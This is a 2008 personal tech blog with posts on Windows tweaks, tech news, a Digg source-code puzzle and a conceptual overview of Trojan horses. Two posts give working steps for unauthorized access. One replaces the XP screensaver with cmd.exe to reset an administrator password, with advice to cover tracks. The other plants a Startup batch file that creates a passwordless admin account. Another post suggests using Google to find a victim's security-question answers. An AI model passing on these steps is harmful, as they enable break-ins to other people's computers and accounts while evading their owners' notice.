Thursday, November 20, 2008

Digg Source Code has a "Secret Message"


Nowadays Digg is popular amongst the bloggers .Recently I came to know about this, the homepage of Digg contains a "Secret Message". This secret message is in the source code of the Home Page of the website in the form of a comment at the very bottom .After analyzing the code it seems that some physics-lover has worked on the code of the website.The message is :::




< !-- digg is done serving you. 2.01355321270u 137.03599911 6.6742x10-11m3kg-1s-2 6.6742x10-11m3kg-1s-2 -->

This line is a comment and thus not visible on the website but can easily be seen in the source code of the homepage.These are not just random numbers but are a result of very smart physics work done at the Digg labs.
What is the significance of these numbers ? Take a guess (Hint :: Relate these numbers to physics)...


OK,here is the answer.....

  • 2.01355321270u :: This is the atomic mass of the hydrogen isotope known as Deuterium.
  • 137.03599911 :: This is a complicated one and really a geek in physics can figure this out.This is Inverse of the Sommerfield fine-structure constant.
  • 6.6742x10-11m3kg-1s-2 ::The last two numbers are the same.This one is very easy to guess and is known as The Gravitational Constant(G).
The numbers represent Deuterium, Inverse of the fine structure constant, G, G.
After the analysis what we get is ::
2.01355321270u :: D
137.03599911 :: I
6.6742x10-11m3kg-1s-2 :: G
6.6742x10-11m3kg-1s-2 :: G

Finally , the secret message is DIGG !!.
Ohhk..someone at Digg is crazy or should i say a geek who came up with this crazy idea of encrypting "DIGG" as such a weird figure so that no one figures it out easily thereby getting them involved into this puzzle. What you say!!.


Links to Check::
Digg Home Page
Hyperevo
Wikipedia (For physics related information)

Technogarage
read more...

Monday, October 20, 2008

Prevent PenDrive Virus

Nowadays Most Common medium for Virus are PenDrive . Following steps help to prevent PenDrive Virus .



1) Disable autorun/autoplay function of your pen drive.

2) Now plugin your pen drive and open any folder of your computer.
(Do not open any folder from ur pen drive.)

3) Now goto tools then select Folder Option .
In that box mark the Show Hidden Files & Folders option.
Also Uncheck Hide Extension for known file types & Hide Protected OS files.

Now click apply and ok buttons and close that folder.

4) Nome come to Desktop.
On the Desktop, click on windows Start button and select Search for files & folders.

When the search dialog box appears on the screen, in that click on All Files & Folders, now click on More Advanced Options then select search Hidden files & folders.

Now go above & in Look In option, select your pendrive letter .
(For example E: Or G:) and hit Enter.

5) Now if you see any unknown .Exefiles, simply delete them all.

I hope this Tip give you some relax.
read more...

Wednesday, October 15, 2008

Crazy Typewriters

Imagination have no boundaries and people ready to experiment can take their creativity to another level.Recently while surfing the net I came across this post on some site,what drew my attention was the work of Mr.Jeremy Mayer who collects antique typewriters, not to display them but to break them into small components and then combine them into some amazing sci-fi-inspired bugs, skeletons and human figures.
Mayer, who describes his work as a cross between Leonardo da Vinci's mechanical drawings and the gritty futures imagined by sci-fi maestros William Gibson and Philip K. Dick, assembles his artwork without welding, soldering or gluing.












Amazing Isn't it!!
read more...

Monday, October 13, 2008

The Great Zero Challenge

In order to permanently delete data the only way is to destroy the hard drive ?Can we save the Hard Drive for future use destroying permanently the data?Can we recover data from a hard drive that has been overwritten with zeros once?
This is what The Great Zero Challenge is all about.It starts with the line::

It is noble and just to dispel myths, falsehoods and untruths

The challenge is organized by a firm in US named 16 systems and any established, professional data recovery company within USA can participate.Data recovery companies were contacted and the response of one of them was
According to our Unix team, there is less than a zero percent chance of data
recovery after that dd command. The drive itself has been overwritten in a very fundamental manner. However, if for legal reasons you need to demonstrate that an effort is being made to recover some or all of the data, go ahead and send it in and we'll certainly make an effort, but again, from what you've told us, our engineers are certain that we cannot recover data from the drive. We'll email you a quote
.

And the website quotes-As of September 6th, 2008 the challenge stands unaccepted.Check out the details of the challenge.
The organization (16Systems) have used a new Western Digital (WD800JB) 80GB hard drive with a default initialization and NTFS format from within Windows XP.They have used a Unix dd command using /dev/zero as input to overwrite the drive.You don't actually have to recover any more data to win the challenge, just tell them the name of one of the two files or the name of the one folder that existed in this screen shot before the dd command was executed.
The prize money is mere $500.00 USD (if the challenge is won) but the challenge should be accepted as they say "to dispel myths" because many people believe that in order to permanently delete data from a modern hard drive that multiple overwrites with random data, mechanical grinding, degaussing and incinerating must be used thus lots of good, usable hard drives are ruined in the process.
for more information check out this link ....
read more...

Monday, October 6, 2008

Trojan Horses::The Virus!!

Trojan Horse in History




The term comes from the a Greek story of the Trojan War, in which the Greeks give a giant wooden horse to their foes, the Trojans, ostensibly as a peace offering. But after the Trojans drag the horse inside their city walls, Greek soldiers sneak out of the horse's hollow belly and open the city gates, allowing their compatriots to pour in and capture Troy..

Trojan Horses





Back to the "modern" Trojan Horses. They're pretty much the same: invisible to the naked eye; appear within harmless programs; require some form of user/operating system intervention to activate; and they do something unexpected by surprise. This article is just to convey a basic principle about the design of Trojan horse programs.

Trojans are designed to access permissions and exploit resources. The goal of password snatchers is to securely leak the login/password pairs to the Trojan author, and the goal in kleptographic attacks is to securely leak private keys to the attacker.

Nature of Trojan Horses

There is no "real" definition of a Trojan horse. It all depends on the perspective of the user that runs into it. From the perspective of a hacker (generally black-hat hackers), a reboot monitoring Trojan (useful in making sure no one used your machine) is not a Trojan to him/her since the hacker knows what it's about. From a law enforcement agent or people like that, it is a Trojan since the agent doesn't know it's there.

There are two examples of Trojans. One is a Trojan that is nothing more than a bug. Don't think that's a good thing. This bug could be bad enough that when planted properly, a Trojan author can break into the computer system. The second Trojan is a mathematical one. The statistical distribution of the output of a random number generator is affected so that it makes the generator very sensitive to the input entropy (I will not go into detail in this, please Google if you do not understand this [:)].

Trojan Horses in a text editor

An example of a text editor being used as a target for a Trojan horse:

If there was an installed text editor on a multiuser operating system which cannot be deleted or modified by the users themselves, then this program has certain unique privileges. For instance, It can access all the text files that users create or open. This would be the perfect target for a Trojan horse. When the Trojan is installed on this program, it will store data from users and makes the data accessible for the Trojan horse author.

Salami Slicing

There was once an article describing a Trojan horse attack that was intended to achieve money. This was carried out by an employee of a bank. He managed to get 70 000$ by taking a few cents from every account, and transferred it into his own account. It got the name of salami slicing because small amounts of money were taken from a lot of accounts. It's pretty useful to prevent anyone from noticing any drastic changes. The bank Trojan had access to money therefore the Trojan steals the money. Therefore, a text editor has access to documents so the Trojan steals the documents (pretty simple isn't it?).

Password Snatching

Every hacker would love to steal login/password pairs (referring to black-hat hackers). Password-snatching programs are installed when a system is infiltrated. These programs are also called rootkits. They were probably written in DOS terminate and stay resident programs (TSR). They record all keystrokes entered via the keyboard and patch the operating system hardware interrupt for key presses and log them to a file.

It is best if a password-snatching Trojan is hosted in a program that could access the passwords of users, like the UNIX "passwd" program. It verifies the identity of UNIX users by checking the login/password pairs. One could copy the Trojan to the end of the passwd program, or one could modify the source code for the password program, recompile it, and then install the compromised version (only if the root access is possible).

However, if the source code for the passwd program is updated and the administrator compiles a new version of it, then the attack would fail. So it would make sense to install a Trojan horse into the compiler which will increase the percentage of success of the attack. But if the compiler is recompiled, then the code that secretly inserts the Trojan into the passwd program would be gone.
______________________________________________________________________

There's not much left for me to explain. But one more thing for you to see :

Ken Thompson described an involved Trojan horse attack.

CODE :
compiler(char*s)
{
...
}


This is a figure of a normal compiler (ANSI C notation) (I did not create this)

The parameter s is a pointer to a string that contains the source code. The idea is to insert a source level Trojan horse into the source code of the compiler that checks for two patterns in the string s.

The first pattern is source code corresponding to the password verification program. When it is found, the password-snatching source code is added to the program before it is compiled. But the Trojan is not saved to the source file of the password program.

The second pattern is source code corresponding to the compiler. When it is found, the entire compiler Trojan is included in the compiler source code. It will contain all of the source code for the Trojan which is marked by the "if" statements in this following figure.

CODE :
compile(char*s)
{
if (match)s,pattern1) ==true)
{
compile(trojan1);
return;
}
if (match)s,pattern2) ==true)
{
compile(trojan2);
return;
}
...
}


Figure of a compiler with Trojan (ANSI C notation)(I did not create this either)

Whenever the compiler is compiled, the Trojan copies itself into the source file for the compiler. It can be added to the source for the compiler then the compiler could be recompiled, and the old compiler could be replaced. This would remove all traces of the source code for the Trojan attack. It would remain in binary form, integrated with the compiled instructions.

So Thompson's Trojan horse attack exploits the capabilities of its host. For example, it exploits the fact that compilers are used to create programs such as the passwd program and the compiler itself.
Also, it exploits the fact that the passwd program has access to login/password pairs and that the compiler has access to them as well by transitivity.

Yeah... I believe that this is okay to be an overview of Trojan horses.
read more...

Ankit Fadia Certified Ethical Hacker

This post is dedicated to those who want to become ethical hacker , you can be trained and

certified by computer security guru Ankit Fadia himself. AFCEH or “Ankit Fadia Certified

Ethical Hacker” course is a certification program on computer security. It is a computer

security course that helps IT security professionals protect internet enabled computer

security systems against cyber security threats and hacking. It helps people become more aware

about cyber crime and IT security measures to counter it.


They say the first five batches of this course were sold out with 5000 participants from 91 cities

across India and now courses have been started in Malaysia, Vietnam, Singapore, Thailand and

China. This training and certification program is exclusively available at Reliance

WebWorld outlets in over 100+ cities across India. You can contact them for the next course details.


All training material for the course including live video lectures, video recordings, video

workshop demonstration, online study material, books and online exam will be prepared by

Ankit Fadia. Remember AFCEH certification is valid for two years only and you need to

retake the examination to renew your certification later. I checked the Registration Fees are

Rs.6499 and you will receive free copies of Ankit Fadia’s 6 internationally best selling security and hacking books.


Buy The Unofficial Guide to Ethical Hacking, Second Edition

read more...

Wednesday, October 1, 2008

Move your Mouse cursor without Mouse !!

Control your mouse pointer with keyboard keys in all windows versions. When your mouse stops working, you can enable this keyboard feature to complete your important work. This keyboard mouse can performs all tasks same like a normal mouse.

Follow the given steps to activate the keyboard mouse:

To edit this feature, first you should log onto your computer with administrative rights.
To activate this feature, press Alt+Shift+NumLock keys at once and you will receive a small MouseKey box.



To keep MouseKeys on, click on Ok button or click on cancel button to cancel MouseKeys box.
Click on Settings button, if you want to adjust the mouse cursor detail settings.



Here a new dialog box will appear with the title "Settings for MouseKeys", now you can manage all mouse settings for example mouse cursor speed, acceleration and some other features.

Now using Numeric keypad, you can move your mouse pointer. The controls are:

* 1,2,3,4,6,7,8 and 9 keys are used to move the mouse cursor into different
direction.
* Key 5 is used as mouse click button.
* Insert key used to hold down mouse button.
* + Sign used to double click on any object.
* Delete button used to release the mouse.
* Click on NumLock button to disable this keyboard mouse feature.

or apply above setting by following steps:-

* Start -> All program -> Accessories -> Accessibility -> Accessibility Wizard.
read more...

Eliminate the needless visual effects for better windows performance

Increase the performance of your computer by eliminating the needless visual effects. By default windows XP gives you many options in the graphics fields to enjoy maximum graphics. For example, you can add pictures on folders and drop shadow on icon to give you better look but it will effect on the performance of your computer, especially on an older computer. Window XP has many default graphics which is not so useful for a common user, if you re-adjust these graphics then there is less effect on the user activities but the performance of computer will be increase tremendously. Here I will tell you how to choose:
To edit these settings, first you should log onto your computer with administrative rights.

Click Start button and type sysdm.cpl in Run box then press Ok button for next.


Here a dialog box will appear with the title "System Properties", select "Advanced" tab.


Here click on Settings button under Performance area.


When you have done then "Performance Options" dialog box will appear with different options. Here select the Visual Effects tab and choose the settings you want to use for the appearance and performance of windows on this computer.

Turns off all the visual effects in the option of "Adjust for best performance" and when you select the option "Adjust for best appearance" it will gives you opposite effect ,Everything will turns on. Selecting "Let Windows choose what's best for my computer" triggers, as you might guess, different choices on different computers. And to pick and choose individual effects yourself, choose "custom" then decide which ones you want.


press OK.
read more...

Sunday, September 28, 2008

How to enable the advance performance setting in windows vista?

If you have noticed that the speed of your system is very slow with windows vista then today tip is very useful for you to increase the performance of windows vista. There is some default setting in vista which is used to manage the write caching on disk. By default windows enabled the write caching on disk but the advanced performance setting is disabled.

Follow the given steps to configure the advance performance setting in Windows Vista:

To enable this feature, you will need to be logged into your computer with administrative rights.

First right click on My Computer icon then select the option Manage.

Here small windows will appear with title Computer Management, now select the Device Manager option, then locate the SATA Disk under the Disk Drives.

Here select the enable advanced performance sittings on the SATA disk.


Now click on Ok button to apply the setting and restart your computer after any changes to go into effect.
read more...

Saturday, September 13, 2008

Integrated Circuit :: Celebrating half centuary

The integrated circuit is 50 year old today(12 september 2008). It’s half a century since the first integrated circuit was demonstrated by Jack Kilby at Texas Instruments Jack Kilby's first integrated circuit

If it wasn’t for the invention of the integrated circuit, then computers today would probably be housed in huge mahogany cabinets with a baffling array of polished, brass valves, or at least be stuffed into huge boxes containing hand-soldered transistors. We owe a lot of thanks to the integrated circuit, or microchip, which is today celebrating its 50th birthday.

The first microchip (pictured) was first demonstrated by Jack Kilby from Texas Instruments on 12 September 1958. It might not be much to look at, but then Texas Instruments admits that Kilby often remarked that if he’d known he’d be showing the first working integrated circuit for the next 40-plus years, he would’ve ‘prettied it up a little.’ The chip worked, though, producing a sine wave on an oscilloscope screen at the demo.

The integrated circuit itself is the germanium strip that you can see in the middle of the glass slide, and it measured 7/16in by 1/16in. With protruding wires, and just containing a single transistor, some resistors and a capacitor, it’s a primitive chip by today’s standards. However, it opened the gate for mass production of larger-scale chips that could contain more and more transistors without the need for complicated hand-soldering jobs.

This was a major factor when it came to using lots of interconnected transistors, and in 1958 Texas Instruments was researching a new idea called the ‘micromodule,’ in which the components of a circuit all had the same size and shape, but still didn’t address the problems concerning high numbers of transistors.

In July 1958, Kilby took it upon himself to find the answer to small-scale modules with large numbers of transistors. As a new recruit at Texus Instruments he wasn’t able to take a two-week leave while his other colleagues were off sunning themselves. Instead, he confined himself to his lab alone where he came up with the idea of fabricating all of a circuit’s components with a single block of the same material. Two months later, the first integrated circuit was demonstrated, and technology has never looked back.

Kilby also kept very detailed notes on all of his work. He later went on to develop the first handheld electronic calculator at Texas Instruments in 1967, and racked up a prestigious et of awards, including the Nobel Prize in physics, the National Medal of Science and the National Medal of Technology.

To mark the occasion, Texas Instruments has recreated the original lab where Kilby worked on the first integrated circuit at its HQ, which it hopes ‘will inspire future inventors and serve as a visual reminder of the power of science and technology combined with creativity.’ The company has also contributed to a fund to put up a statue of Kilby in his hometown of Great Bend, Kansas.


read more...

Wednesday, September 3, 2008

Chrome - The Internet Explorer Killer ???

Chrome to Google is what Internet Explorer to Microsoft. Yes, you are right. Chrome, a web browser, is the newest google product intended, as people might say, to compete with Microsoft’s Internet Explorer dominance.

Some of the interesting points of the Chrome browser include:
  • A new UI that places the tabs above the address bar, instead of the traditional way
  • Incognito mode, which will allow you to browse the web in complete privacy, without recording any of your activity.
  • A new JavaScript engine to speed things up
  • They've even put up a web comic to provide users with additional information regarding Chrome.
Can Chrome do it? The more important thing for us, the users, is not about which’s winning what . Having more options to browse and hence, as Google says, to “add value for users and, at the same time, help drive innovation on the web” is a lot more substance.

This is what some bloggers say…

The software will be seamlessly integrated, and it will make Google’s (and other) online apps, games, etc. richer and simpler to use, especially if/when you’re offline. It will feature a Google search window (and, unlike Microsoft, Google won’t get in trouble when it sets the default to Google). It will be capable of running directly on any device without Windows. Unlike Windows, it will be free. And it will come pre-loaded–just like Windows–because who really wants to bother with downloadin.

download google Chrome from here.
read more...

Friday, August 29, 2008

MICROSOFT product ..without any bugs ??

Hellozz.. friends I have received a mail from my friend saying the above picture is of Bill gates's daughter. You all must be very curious of the above statement and some of you might be familiar with this photo recently.
I had actually do some research and surfing online to find out the truth.


I got a link (http://www.nndb.com/people/435/000022369/), i came to know that gate's eldest daughter was just 12 years old! and her name is Jennifer Katherine and was born on 26-Apr-1996.When gates had married he was 39 years old .

Bill Gates children is:

* Jennifer Katharine Gates, his daughter born in 1996
* Rory John Gates, his son born in 1999
* Phoebe Adele Gates, his daughter born in 2002

Now question rounding in my mind is who is this girl........?

If anybody knows just write a reply in my blog....:)


read more...

Thursday, August 21, 2008

The Cyberspace War

AS the violence unfolded between Russia and Georgia during the past week, hackers waged war on another front: the Internet.
The Georgian government
accused Russia of engaging in cyberwarfare by disabling many government Web sites, making it difficult to inform citizens quickly of important updates.
Russia said : it was not involved and that its own media and official Web sites had suffered similar attacks. although a cease-fire has been ordered, major Georgian servers are still down, hindering communication in the country.
Some Georgian officials, bloggers and citizens
were able to work around the disruptions,
sending text messages to friends in other countries using web sites hosted by US servers that are less likely to fall victim to a cyberattack

http://www.wowmails.com


Concerted online attacks have been a threat for years.
But security experts say the
"cyberwar" between Russia and Georgia underscores the havoc that can spread on a digital battlefield. It also highlights how vulnerable Web-reliant countries are to assaults that could cripple military communications or a national banking industry.

http://www.wowmails.com

The attacks against Georgia's Internet infrastructure began nearly two months before the first shots were fired, according to security researchers who track Internet traffic into and out of the countries. Such attacks, known as "denial of service" attacks, are triggered when computers in a network are simultaneously ordered to bombard a site with millions of requests, which overloads a server and causes it to shut down.

http://www.wowmails.com

"In terms of the scope and international dimension of this attack, it's a landmark," said Ronald Deibert, director of the University of Toronto's Citizen Lab, which has nearly 100 researchers mapping Web traffic through several countries, including Russia and Georgia. He said smallscale attacks have occurred between the countries since June.
"International laws are very poorly developed, so it really crosses a line into murky territory .. Is an information blockade an act of war ?"

http://www.wowmails.com

Cyberattacks can be launched cheaply and easily, with a few hundred computers and a couple of skilled hackers.Simpler tactics are even easier to mount by hacking into a server and deleting files, reconfiguring settings and altering photos. Compared with expensive military attacks, cyberwar tactics "seems like the kind of thing that a sophisticated military would want experiment with ," said Ben Edelman, assistant professor at Harvard Business School who has studied cyberattacks.

http://www.wowmails.com

"Imagine how devastating it would be to a military commander
to lose access to a server that tells him where his troops are stationed and where he has resources," he said, adding that "this is the first time we've had such strong evidence of cyberwarfare. "
Instructions on how to mount such attacks are readily available on blogs, making it easy for a grass-roots effort to quickly escalate into a crippling assault.
Figuring out who is behind the attacks has been difficult, Deibert said, because of complex routing methods and a multitude of connection exchanges. The Internet's infrastructure is a maze of lines laid by different service providers traversing many countries, masking how information is traveling — or blocked. 'It's an ongoing battle in documenting where it's coming from and helping people get around it," he said.

http://www.wowmails.com

In Georgia, which is not as dependent on the Internet as other nations, the cyberattack mainly hindered the government's ability to communicate with its citizens and others during the fighting. The Georgian Foreign Ministry's Web site, for example, was disabled except for a collage that compared Georgian president Mikhail Saakashvili with Adolf Hitler.
To get around the blockade, Georgian officials relocated national Web sites to addresses hosted by Google's Blogspot, whose US servers are more immune to attack. Citizens used blogging platforms such as LiveJournal — the dominant platform in Russia and Georgia — to post their own reactions during the fighting.
For example, a Georgian refugee from Abkhazia who blogs under the name Cyxymu on LiveJournal, posted photos of Russian troops entering the Georgian town of Gori.
The blogger said the photos were taken after Russia had announced its withdrawal,
proving, he said, that fighting continued.

http://www.wowmails.com

Morozov said only a few hundred Georgians used blogs to communicate with people outside the country. Even that tool was threatened, he said, when a group of Russian bloggers sent a letter to Sup, the Russian company that owns and manages LiveJournal,
to censor posts with pro- Georgian sentiment. Sup did not comply. The cyberwar will most likely serve as a Web security wake-up call, Morozov said."Georgia was completely unprepared to the fact that all this information was on the Internet," he said. "I think it taught them — and a lot of people — a lesson."
read more...

Sunday, August 17, 2008

WHO THE HELL IS SHE ????

India celebrated 61 independence day and we are thrilled that India grown up and so peoples,
But...these pictures I got through mail shows the gross disrespect and insult to the Indian National flag by this so called 'spiritual leader' and self proclaimed 'GOD' Mataji Nirmala Devi. this disrespect to our country's flag shows that she has definitely no respect or love for the country that gave her so much and her husband who was an IAS officer and chief of the SCI (he is seated next to her in he pics)... such as shame.






Is really India grown up ?????????
read more...

Saturday, August 9, 2008

Windows Process Information

Yesterday, my friend Anna was asking me about process and want to know that which process window need and which are unnecessary.I found a intresting site which help to solve this problem.
When pressing Ctrl+Alt+Delete on your computer you’ll get the task manager. In the task manager you can find a lot of valuable information such as: which applications and process are running at the moment, your pc performances, some info about your network activities and the current user which is logged on the computer.
When looking at the process tab in your task manager you’ll find that there are a lot of processes on your computer which are running. Some of them speak for them selfs such as: Photoshop.exe (which means that Photoshop is running), FireFox.exe (which means that FireFox is running) and you’ll also see some process which you didn’t start or know about. Processes like alg.exe, svchost.exe, ccapp.exe, ctfmon.exe etc..
There might also be a process of a program which you have installed with the autorun function (So it starts each time you turn your computer on!). Here’s what I do in this situation, depending on which program it is and if I NEED it, I’ll make sure that this doesn’t run when I turn my computer on.
I find the information in the process tab very handy cause I want to know what my pc is up to and which process are running at the moment. There are process which can be stopped simply because you don’t need/use them. Some of them can’t/shouldn’t be stopped because Windows XP needs them!!
By disabling the unnecessary process and the autorun programs you can gain more CPU & RAM resources and you’ll also notice that you’r computer is starting up more quickly.
So if you need to find more information about the process which are running on your pc and which you don’t know about, you can visit File.net.
On File.net you can find some background information about the process, which program uses that process, what it’s good for and how you can remove/stop the process.
So be in control of your computer and decide which programs may run on your computer.
read more...

Friday, August 8, 2008

WINDOWS TIPS COLLECTION

How to hack windows XP admin password

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user password"
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.

Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks
No Shutdown:
Wanna play with your friends by removing the shutdown option from start menu in their computer.
Just hack it down !!!
Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
"NoClose"="DWORD:1"
Menu Delays:

Another minor and easy tweak to remove any delay from menus sliding out. For this you will need to use regedit (open regedit by going to Start -> Run..., then typing 'regedit' and pressing enter). The key you need to change is located in HKEY_CURRENT_USERControl PanelDesktop. The actual key is called MenuShowDelay - all you have to do is change the value to 0. Remember, you will have to re-boot your computer for this tweak to take effect.

Create a Shortcut to Lock Your Computer


Leaving your computer in a hurry but you don’t want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver. To create a shortcut on your desktop to lock your computer: Right-click the desktop. Point to New, and then click Shortcut. The Create Shortcut Wizard opens. In the text box, type the following: rundll32.exe user32.dll,LockWorkStation Click Next. Enter a name for the shortcut. You can call it "Lock Workstation" or choose any name you like. Click Finish. You can also change the shortcut's icon (my personal favorite is the padlock icon in shell32.dll). To change the icon: Right click the shortcut and then select Properties. Click the Shortcut tab, and then click the Change Icon button. In the Look for icons in this file text box, type: Shell32.dll. Click OK. Select one of the icons from the list and then click OK You could also give it a shortcut keystroke such CTRL+ALT+L. This would save you only one keystroke from the normal command, but it could be more convenient.


read more...

Hacking with Google, Is it Possible

hello friend i got this stuff during surfing and i found it intresting.......

Every hacker needs to develop his abilities if he wants to maintain up to date. That's why he will use every tool he can find. From all of these possible options, Google hacks have become a new instrument for hackers. Although Google hacking isn't widespread knowledge, it should be understood by any hacker and even for the everyday computer user.

But, if you want to become a hacker, Google is the way to go. Learn how to hack Google and you will acquire a powerful tool for your everyday work.

What Is Google Hacking?

Basically, it's the ability to use Google for finding hidden bits of data or information that the hacker can use for his advantage. Or in other words, hacking Google search appliance. How so? Let's say that you are a black hacker (someone who uses his hacking abilities for selfish purposes) and want to access the email account of a chosen victim. The first thing that hacker's do is to find out what is the secret question in the email account of their prey. Let's say that the secret question asks the name of the pet of the account owner. How can the hacker learn it?

Besides asking the pet's name to his victim (which is very suspicious), it's probable that that bit of information is lost somewhere in the internet. Maybe the owner went into a forum regarding pet insurance and left inside the name of his dog. These are the kind of things that Google permits to find.

Another common use is to hack Google adsense click. That way your webpage will have a higher position when a related query is made through Google. After all, more clicks means more money for you.

How Is It Done?

If you want to make a typical search in Google, let's say, house insurance, you only need to put those words in the query bar and press the search button. In the case of a Google hacker, he will use special characters that the common user doesn't use or doesn't even considered using. For example: +, /, and -.

Each one of these characters are used for special purposes. For example, if you use the minus sign just before a determined word, like dog, Google will only show those searches were the word dog doesn't appear.

One of best places for finding a how to hack with Google tutorial is the Google Hacking database, posted online by the hacker Johnny Long. In this webpage, you will notice hundreds of ways of using Google for exploiting the weak points of servers and webpages.
read more...

Sunday, August 3, 2008

Create Administrator Account using Guest Account

I was wondering if this was possible. and oh yes it is possible. but the PC in which you want to create an admin account, an administrator who logs on regularly must be present. ( I mean someone with an administrator account must log in ) This process can be divided in to .... lets say about 5 steps. and here are the cools 5 steps to create your own admin account:


1. Right click desktop NEW> Text Document


2.Write the following in the notepad
@echo off
net user Newadmin /add /expires:never /passwordreq:no
net localgroup “Administrators” /add Newadmin

3.save the file and rename it to what ever you want with the extention .bat


4.Copy the file to the Startup folder. Here is the path to the Startup folder:

C:\Documents and Settings\All Users\Start Menu\Programs\Startup
5.The next time the admin logs on into the computer, the batch file runs and the admin account is created. Once the admin logs off, you can log in using the username newadmin and without any password.
Remember that it wouldn’t take long for the real admin to find out that a new admin account has been created.
Hope this helped someone who needs an admin a/C.
read more...

Firefox Addons FIRE


Most of firefox fans are aware of awesomeness of Mozilla Firefox 3 address bar but few are aware that this awesome bar can be upgraded by using some Firefox addons and can be made more useful.

Here is the list of 5 Firefox 3 addons which can improve the working and efficiency of your Mozilla Firefox 3 address bar.

1.oldbar - Oldbar makes the location (URL) bar look like Firefox 2. If you need another alternative to this, try out Old Location Bar. Oldbar just makes the location bar look like FireFox 2 Old Location Bar makes it ACT like Firefox 2.
2.Hide Unvisited - You too can hide pages bookmarks that you haven't visited , since deleting or clearing history, from showing in the Address Bar.
3.Enter Selects - This Extension allows you to press enter in the Address Bar to select the first result without pressing down.
4.Hidden Places - Stop URLs from specified domains being added to places and the Address Bar.
5.Edit Middle - Show AwesomeBar results when editing in the middle not just at the end.
I personally feel that even without addons firefox 3 is a nice and safe web browser compared to others.
read more...

Monday, July 14, 2008

Google Adsense " Better than any other program"


Google’s AdSense is a fascinating revenue-sharing opportunity for small, medium and large web sites. Some webmasters are designing brand new sites specifically for serving AdSense text ads. (It’s against the AdSense rules to design a site purely for AdSense, so you’ll want to include a few affiliate Affiliate links or sell your own product, too.)
I read an article about how to increase adsense revenue from associate programs here is the analysis from the article
Let’s say you have a goal of earning $100,000 a year from AdSense. Is that possible? Let’s see … $100,000 divided by 365 = $274 a day. So your goal is to produce either:
  • 274 pages which earn $1 a day or
  • 548 pages which earn 50 cents a day or
  • 1096 pages which earn 25 cents a day
The following are hypothetical cases. To earn $1 a day per page, you need, per page…
  • 400 visitors, 5% click-through rate (CTR CTR) and average 5c payout.
  • Or 200 visitors, 10% CTR and an average 5c payout.
  • Or 100 visitors, 10% CTR, and an average 10c payout.
  • Or 100 visitors, 5% CTR, and an average 20c payout
Let’s assume you choose a goal somewhere around the middle, say aiming for 50 visitors per page and want 274 pages earning $1 a day. You’d need 274 x 50 = 13,700 pageviews a day.
Does that sound too tough? If so, you’d better look for more profitable keywords and ways to improve your click-through rates.
Let’s try a different scenario, You choose more profitable keywords and make your $1 on average per page from, say, 10 visitors. 274 x 10 = 2740 pageviews a day, That’s looking easier to achieve, If your average visitor sees 3 pages, you now need 913 unique visitors a day.
Is that too tough to achieve in your niche? If so, create two sites, each attracting half that number, 456 unique visitors, a day, Can’t achieve those click-through rates and payouts? Then you’ll either need more pages on your sites on more niche sites.
Please note, because of the AdSense rules, these are all hypothetical cases. I’m not allowed to give real cases. Real CTR rates and payouts vary hugely.Choose the goal which best matches your site or sites.
Then start building keyword-rich pages containing well researched, profitable keywords, and get lots of high quality links to your site.
For example, if your site is about topics such as debt consolidation, web hosting or asbestos-related cancer, you’ll earn much more per click than if it’s about free things.
On the other hand, if you concentrate only on top-paying keywords, you’ll face an awful lot of tough competition.
What you want are keywords that are high in demand and low in supply, So do some careful keyword research before you build your pages.
read more...

Saturday, June 21, 2008

ATI Radeon HD 4850 gets official:available immediately



Considering that we've already seen AMD's ATI Radeon HD 4850benchmarked, it's not like we really needed some official verbiage to cement our belief that the unit was real. Nevertheless, said verbiage certainly doesn't hurt, and that's precisely what's been delivered this morning. The HD 4850 is a single-slot PCIe 2.0 card featuring 512MB of DDR3 RAM, a 625MHz clock speed, 993MHz memory speed, 480 stream processors and support for CrossFireX / DirectX 10.1. We're also told that at least Diamond Multimedia's HD 4850 is available as we speak from a number of fine retailers, thus we presume everyone else's version of the card shouldn't be too far behind.
read more...

Google plans to become net-access nanny

Google is planning to release tools that let internet users know if their service provider (ISP) is tampering with their internet connection - for example by throttling access to popular bandwidth-heavy sites.

It is the latest round of the net neutrality debate. Net neutrals like Google say the the internet should be a straightforward commodity. Although you may pay more or less for access, what you get is always the same - freedom to use and access the internet as you wish, with all those potential activities being treated the same by your ISP.

In the opposite corner are those who think ISPs should be able to choose which services they support, and which they don't. For example, under this scheme an ISP could slow all traffic to pizza delivery sites except those it had commercial agreements with.

Google's planned software will let you know when that is happening, by presenting an easy-to-understand breakdown of how your connection has been performing. Exactly how has not been revealed. I'm guessing one way would be to let you know if certain applications or websites consistently perform badly on your connection, compared to Google's own data on how they usually perform.

Google is one of the most influential pro-neutrality organisations. But its as-yet-unnamed tool (Throottle, Nootral?) is unlikely to be downloaded by large numbers of people.

If Google wanted to push it to more than just principled geeks it could throw it in with Google Toolbar, which already comes bundled with other software. Adding the neutrality nanny into that mix could dramatically increase its impact.









read more...